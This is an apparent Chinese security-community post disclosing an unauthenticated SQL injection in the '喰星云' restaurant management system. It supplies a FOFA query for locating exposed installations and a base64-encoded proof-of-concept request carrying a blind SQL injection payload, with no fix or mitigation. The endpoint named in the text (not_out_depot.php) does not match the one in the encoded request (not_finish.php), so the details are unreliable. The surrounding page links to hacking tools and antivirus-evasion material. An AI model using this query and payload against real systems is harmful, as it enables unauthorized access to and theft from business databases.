喰星云-数字化餐饮服务系统-SQL

0741102

1. 漏洞描述

喰星云-数字化餐饮服务系统 not_out_depot.php接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息.

fofa:title=“喰星云·数字化餐饮服务系统” || body=“tmp_md5_pwd” || app=“喰星云·数字化餐饮服务系统”

poc:

R0VUIC9sb2dpc3RpY3MvaG9tZV93YXJuaW5nL3BocC9ub3RfZmluaXNoLnBocD9kbz1nZXRMaXN0JmxzaWQ9KFNFTEVDVCsoQ0FTRStXSEVOKyg2MTkyPTYxOTMpK1RIRU4rJycrRUxTRSsoU0VMRUNUKzk2NDErVU5JT04rU0VMRUNUKzIzODQpK0VORCkpIEhUVFAvMS4xIEhvc3Q6IFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjcuMC4wLjAgU2FmYXJpLzUzNy4zNg==(base解码6查看poc)

© 版权声明
1 如果您喜欢本站,点击这儿赞助下本站,感谢支持!
2 可能会帮助到你: 下载帮助 | 报毒说明 | 进站必看 | 广告合作
3 本站素材资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责;
4 本站大部分素材资源来源于网络,仅供学习与参考,请于下载后24小时内删除;
5 若作商业用途,请联系原作者授权,若本站侵犯了您的权益请 联系站长 进行删除处理;
6 如若转载,请注明文章出处:
THE END
web渗透
喜欢就支持一下吧
点赞102 分享
Hpny的头像-鹏组安全社区
PassiveRecon-1.8.5-鹏组安全社区
PassiveRecon-1.8.5
PassiveRecon-1.8.5
1个月前 1388
老鑫免杀第二期-鹏组安全社区
老鑫免杀第二期
老鑫免杀第二期
2个月前 1111
山石网科WAF 远程代码执行漏洞-鹏组安全社区
山石网科WAF 远程代码执行漏洞
山石网科WAF 远程代码执行漏洞
2个月前 1080
谢公子内网渗透-鹏组安全社区
谢公子内网渗透
谢公子内网渗透
1个月前 1078
goby红队版poc 截止 24年8月7日240807pocs-鹏组安全社区
goby红队版poc 截止 24年8月7日240807pocs
goby红队版poc 截止 24年8月7日240807pocs
2个月前 1057
vshell最新4.9.3版加4.6-鹏组安全社区
vshell最新4.9.3版加4.6
vshell最新4.9.3版加4.6
1个月前 1014
相关推荐
Poc-Gui扫描器-脚本小子必备神器-2024.10.6-鹏组安全社区
Poc-Gui扫描器-脚本小子必备神器-2024.10.6
Poc-Gui扫描器-脚本小子必备神器-2024.10.6
2个月前 1329
各类爆破字典整理-鹏组安全社区
各类爆破字典整理
各类爆破字典整理
5个月前 1313
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘-鹏组安全社区
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘
3个月前 1203
自动代码审计工具(只支持php) — Code-audit-鹏组安全社区
自动代码审计工具(只支持php) — Code-audit
自动代码审计工具(只支持php) — Code-audit
4个月前 1174
渗透测试清单大全-鹏组安全社区
渗透测试清单大全
渗透测试清单大全
2个月前 1143
DNSlog原理及其DNSlog平台搭建-鹏组安全社区
DNSlog原理及其DNSlog平台搭建
DNSlog原理及其DNSlog平台搭建
5个月前 1123
评论 抢沙发
头像
超级会员可评论
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    请登录后查看评论内容

新文文档-会员可获得的东西以及付费说明

EHole_magic(指纹识别工具)-更新10月7日

网站及其内容免责声明

逆向工具箱——次元剑

效率小达人的福音! 鹏组安全社区APP正式上线!

灯塔(ARL)一键安装脚本(修复重置版)

PassiveRecon-1.8.5

Mac渗透工具箱 V1.4

大佬开发神器!一键解密|AI分析|区块链溯源|免杀WebShell

Poc-Gui扫描器-脚本小子必备神器-2024.10.6

活动[已结束]-学习工作累了那就来把游戏奖励自己吧

各类爆破字典整理

漏扫集成系统(AWVS、Nessus、QingScan、巡风、Golin…)

Web安全课程

一键化网站扫描脚本-缝合怪扫描脚本

中秋、国庆双节送礼-紫薯芋鹏组社区!

windows应急响应工具-FindAll

【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘

ctf常用脚本

微信小程序反编译工具,.wxapkg 文件扫描 + 解密 + 解包工具